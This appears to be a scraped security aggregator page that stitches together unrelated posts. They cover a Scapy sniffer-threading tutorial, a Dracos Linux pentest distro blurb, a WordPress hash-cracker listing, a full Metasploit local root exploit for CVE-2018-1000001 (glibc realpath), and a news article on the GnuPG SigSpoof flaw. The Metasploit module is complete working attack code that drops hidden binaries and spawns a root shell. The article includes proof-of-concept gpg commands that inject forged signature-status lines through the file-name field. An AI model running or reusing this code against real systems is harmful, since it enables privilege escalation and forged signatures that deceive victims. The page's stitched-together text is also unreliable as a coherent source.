official documentation about signals, only the main thread receives signals: As a result, when CTRL+C is pressed, only the main thread raises a KeyboardInterrupt exception. The sniffing thread will continue its infinite sniffing loop, blocking at the same time the call of sniffer.join(). So, how can the sniffing thread be stopped if not by signals? Let’s have a look at this next example: from scapy.all import * from threading import Thread, Event from time import sleep class Sniffer(Thread): def __init__(self, interface="eth0"): super().__init__() self.interface = interface self.stop_sniffer = Event() def run(self): sniff(iface=self.interface, filter="ip", prn=self.print_packet, stop_filter=self.should_stop_sniffer) def join(self, timeout=None): self.stop_sniffer.set() super().join(timeout) def should_stop_sniffer(self, packet): return self.stop_sniffer.isSet() def print_packet(self, packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) sniffer = Sniffer() print("[*] Start sniffing...") sniffer.start() try: while True: sleep(100) except KeyboardInterrupt: print("[*] Stop sniffing") sniffer.join() As you may have noticed, we are now using the stop_filter parameter in the sniff function call. This parameter expects to receive a function which will be called after each new packet to evaluate if the sniffer should continue its job or not. An Event object named stop_sniffer is used for that purpose. It is set to true when the join method is called to stop the thread. Is this the end of the story? Not really… $ sudo python3 sniff_thread_issue_2.py [*] Start sniffing... ^C[*] Stop sniffing [!] New Packet: 10.137.2.30 -> 10.137.2.1 One side effect remains. Because the should_stop_sniffer method is called only once after each new packet, if it returns false, the sniffer will continue its job, going back to its infinite sniffing loop. This is why the sniffer stopped one packet ahead of the keyboard interruption. A solution would be to force the sniffing thread to stop. As explained in the official documentation about threading, it is possible to flag a thread as a daemon thread for that purpose: However, even if this solution would work, the thread won’t release the resources it might hold: The sniff function uses a socket which is released just before exiting, after the sniffing loop: try: while sniff_sockets: // Sniffing loop except KeyboardInterrupt: pass if opened_socket is None: for s in sniff_sockets: s.close() return plist.PacketList(lst,"Sniffed") Therefore, the solution I suggest is to open the socket outside the sniff function and to give it to this last one as parameter. Consequently, it would be possible to force-stop the sniffing thread while closing its socket properly: from scapy.all import * from threading import Thread, Event from time import sleep class Sniffer(Thread): def __init__(self, interface="eth0"): super().__init__() self.daemon = True self.socket = None self.interface = interface self.stop_sniffer = Event() def run(self): self.socket = conf.L2listen( type=ETH_P_ALL, iface=self.interface, filter="ip" ) sniff( opened_socket=self.socket, prn=self.print_packet, stop_filter=self.should_stop_sniffer ) def join(self, timeout=None): self.stop_sniffer.set() super().join(timeout) def should_stop_sniffer(self, packet): return self.stop_sniffer.isSet() def print_packet(self, packet): ip_layer = packet.getlayer(IP) print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst)) sniffer = Sniffer() print("[*] Start sniffing...") sniffer.start() try: while True: sleep(100) except KeyboardInterrupt: print("[*] Stop sniffing") sniffer.join(2.0) if sniffer.isAlive(): sniffer.socket.close() Et voilà! The sniffing thread now waits for 2 seconds after having received a keyboard interrupt, letting the time to the sniff function to terminate its job by itself, after which the sniffing thread will be force-stopped and its socket properly closed from the main thread. Source

Dracos Linux ( www.dracos-linux.org ) is the Linux operating system from Indonesian , open source is built based on the Linux From Scratch under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering. Does not use a GUI-based tools-tools and just have the software using the CLI (command line interface) to perform its operations. Now Dracos currently already up to version 2.0 with the code name "Leak". Screenshot Teaser As the target of development Education Dracos Linux is purposed as an educational,especially to recognize the operation system of linux and we respect ethical hacking. Build from source had always been built from codes instead of installer,this will stimulate users in indonesia to stay creative and to build the spirit of opensource. Repository even though proportionally based on codes,Dracos Linux still intends to construct the repository to build up the processes Like Venomizer Heavy Control We need to recognize this operating system Very Dificult Because Dracos in build from source code, thus forcing us to compile when installing a package or software, which of course will arise the possibility of system failure and other system vulnerabilities. Always from terminal None of every singel tool that was installed inside the OS uses GUI. CLI will always consider to particularly openbox to ease the users in need of multi terminal in applying Penetration Testing Penetration Tools List Link: http://dev.dracos-linux.org/projects/dracoslinux/wiki/Penetration_Testing Information Gathering Vulnerability Assessment Web Attack Exploitation Testing Privilege Escalation Password Attack Social Engineering Man In The Middle Attack Stress Testing Wireless Attack Maintaining Access Forensics Tools Reverse Engineering Malware Analysis Covering Track Download: https://dracos-linux.org/downloads.php Source

wpCrack v1.0 - version 1.0 Installation git clone https://github.com/MrSqar-Ye/wpCrack.git WordPress hash cracker Video Contact: Twitter : @MrSqar Send to my email Source

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => "glibc 'realpath()' Privilege Escalation", 'Description' => %q{ This module attempts to gain root privileges on Linux systems by abusing a vulnerability in GNU C Library (glibc) version 2.26 and prior. This module uses halfdog's RationalLove exploit to exploit a buffer underflow in glibc realpath() and create a SUID root shell. The exploit has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1. The target system must have unprivileged user namespaces enabled. This module has been tested successfully on Ubuntu Linux 16.04.3 (x86_64) with glibc version 2.23-0ubuntu9; and Debian 9.0 (x86_64) with glibc version 2.24-11+deb9u1. }, 'License' => MSF_LICENSE, 'Author' => [ 'halfdog', # Discovery and RationalLove.c exploit 'Brendan Coles' # Metasploit ], 'DisclosureDate' => 'Jan 16 2018', 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'AKA', 'RationalLove.c' ], [ 'BID', '102525' ], [ 'CVE', '2018-1000001' ], [ 'EDB', '43775' ], [ 'URL', 'https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/' ], [ 'URL', 'http://www.openwall.com/lists/oss-security/2018/01/11/5' ], [ 'URL', 'https://securitytracker.com/id/1040162' ], [ 'URL', 'https://sourceware.org/bugzilla/show_bug.cgi?id=22679' ], [ 'URL', 'https://usn.ubuntu.com/3534-1/' ], [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1533836' ] ], 'DefaultTarget' => 0)) register_options [ OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), ] end def base_dir datastore['WritableDir'].to_s end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." write_file path, data register_file_for_cleanup path end def upload_and_chmodx(path, data) upload path, data cmd_exec "chmod +x '#{path}'" end def upload_and_compile(path, data) upload "#{path}.c", data gcc_cmd = "gcc -w -o #{path} #{path}.c" if session.type.eql? 'shell' gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}" end output = cmd_exec gcc_cmd unless output.blank? print_error output fail_with Failure::Unknown, "#{path}.c failed to compile" end register_file_for_cleanup path cmd_exec "chmod +x #{path}" end def exploit_data(file) path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2018-1000001', file fd = ::File.open path, 'rb' data = fd.read fd.stat.size fd.close data end def live_compile? return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') if has_gcc? vprint_good 'gcc is installed' return true end unless datastore['COMPILE'].eql? 'Auto' fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' end end def check version = kernel_release if Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.36') vprint_error "Linux kernel version #{version} is not vulnerable" return CheckCode::Safe end vprint_good "Linux kernel version #{version} is vulnerable" arch = kernel_hardware unless arch.include? 'x86_64' vprint_error "System architecture #{arch} is not supported" return CheckCode::Safe end vprint_good "System architecture #{arch} is supported" unless userns_enabled? vprint_error 'Unprivileged user namespaces are not permitted' return CheckCode::Safe end vprint_good 'Unprivileged user namespaces are permitted' version = glibc_version if Gem::Version.new(version.split('-').first) > Gem::Version.new('2.26') vprint_error "GNU C Library version #{version} is not vulnerable" return CheckCode::Safe end vprint_good "GNU C Library version #{version} is vulnerable" # fuzzy match glibc 2.23-0ubuntu9 and 2.24-11+deb9u1 glibc_banner = cmd_exec('ldd --version') unless glibc_banner.include?('2.23-0ubuntu') || glibc_banner.include?('2.24-11+deb9') vprint_error 'No offsets for this version of GNU C Library' return CheckCode::Safe end CheckCode::Appears end def exploit if is_root? fail_with Failure::BadConfig, 'Session already has root privileges' end if check != CheckCode::Appears fail_with Failure::NotVulnerable, 'Target is not vulnerable' end unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true' fail_with Failure::BadConfig, "#{base_dir} is not writable" end # Upload exploit executable executable_name = ".#{rand_text_alphanumeric rand(5..10)}" @executable_path = "#{base_dir}/#{executable_name}" if live_compile? vprint_status 'Live compiling exploit on system...' upload_and_compile @executable_path, exploit_data('RationalLove.c') else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx @executable_path, exploit_data('RationalLove') end # Upload payload executable payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" upload_and_chmodx payload_path, generate_payload_exe # Launch exploit print_status 'Launching exploit...' output = cmd_exec "echo '#{payload_path} & exit' | #{@executable_path}", nil, 30 output.each_line { |line| vprint_status line.chomp } end def on_new_session(client) # remove root owned SUID executable if client.type.eql? 'meterpreter' client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi' client.fs.file.rm @executable_path else client.shell_command_token "rm #{@executable_path}" end end end Source

SigSpoof flaw fixed inGnuPG, Enigmail, GPGTools, and python-gnupg. For their entire existence, some of the world's most widely used email encryption tools have been vulnerable to hacks that allowed attackers to spoof the digital signature of just about any person with a public key, a researcher said Wednesday. GnuPG, Enigmail, GPGTools, and python-gnupg have all been updated to patch the critical vulnerability. Enigmail and the Simple Password Store have also received patches for two related spoofing bugs. Digital signatures are used to prove the source of an encrypted message, data backup, or software update. Typically, the source must use a private encryption key to cause an application to show that a message or file is signed. But a series of vulnerabilities dubbed SigSpoof makes it possible in certain cases for attackers to fake signatures with nothing more than someone’s public key or key ID, both of which are often published online. The spoofed email shown at the top of this post can't be detected as malicious without doing forensic analysis that's beyond the ability of many users. Backups and software updates affected, too The flaw, indexed as CVE-2018-12020, means that decades' worth of email messages many people relied on for sensitive business or security matters may have in fact been spoofs. It also has the potential to affect uses that went well beyond encrypted email. CVE-2018-12020 affects vulnerable software only when it enables a setting called verbose, which is used to troubleshoot bugs or unexpected behavior. None of the vulnerable programs enables verbose by default, but a variety of highly recommended configurations available online—including the cooperpair safe defaults, Ultimate GPG settings, and Ben's IT-Kommentare—turn it on. Once verbose is enabled, Brinkmann's post includes three separate proof-of-concept spoofing attacks that work against the previously mentioned tools and possibly many others. The spoofing works by hiding metadata in an encrypted email or other message in a way that causes applications to treat it as if it were the result of a signature-verification operation. Applications such as Enigmail and GPGTools then cause email clients such as Thunderbird or Apple Mail to falsely show that an email was cryptographically signed by someone chosen by the attacker. All that's required to spoof a signature is to have a public key or key ID. The attacks are relatively easy to carry out. The code for one of Brinkmann’s PoC exploits that forges the digital signature of Enigmail developer Patrick Brunschwig is: $ echo 'Please send me one of those expensive washing machines.' \ | gpg --armor -r VICTIM_KEYID --encrypt --set-filename "`echo -ne \''\ \n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig \ \n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\ \n[GNUPG:] TRUST_FULLY 0 classic\ \ngpg: '\'`" > poc1.msg A second exploit is: echo "See you at the secret spot tomorrow 10am." | gpg --armor --store --compress-level 0 --set-filename "`echo -ne \''\ \n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig \ \n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\ \n[GNUPG:] TRUST_FULLY\ \n[GNUPG:] BEGIN_DECRYPTION\ \n[GNUPG:] DECRYPTION_OKAY\ \n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\ \ngpg: '\'`" > poc2.msg Brinkmann told Ars that the root cause of the bug goes back to GnuPG 0.2.2 from 1998, "although the impact would have been different then and changed over time as more apps use GPG." He publicly disclosed the vulnerability only after developers of the tools known to be vulnerable were patched. The flaws are patched in GnuPG version 2.2.8, Enigmail 2.0.7, GPGTools 2018.3, and python GnuPG 0.4.3. People who want to know the status of other applications that use OpenPGP should check with the developers. Wednesday's vulnerability disclosure comes a month after researchers revealed a different set of flaws that made it possible for attackers to decrypt previously obtained emails that were encrypted using PGP or S/MIME. Efail, as the bugs were dubbed, could be exploited in a variety of email programs, including Thunderbird, Apple Mail, and Outlook. Separately, Brinkmann reported two SigSpoof-related vulnerabilities in Enigmail and the Simple Password Store that also made it possible to spoof digital signatures in some cases. CVE-2018-12019 affecting Enigmail can be triggered even when the verbose setting isn't enabled. It, too, is patched in the just-released version 2.0.7. CVE-2018-12356, meanwhile, let remote attackers spoof file signatures on configuration files and extensions scripts, potentially allowing the accessing of passwords or the execution of malicious code. The fix is here. Via arstechnica.com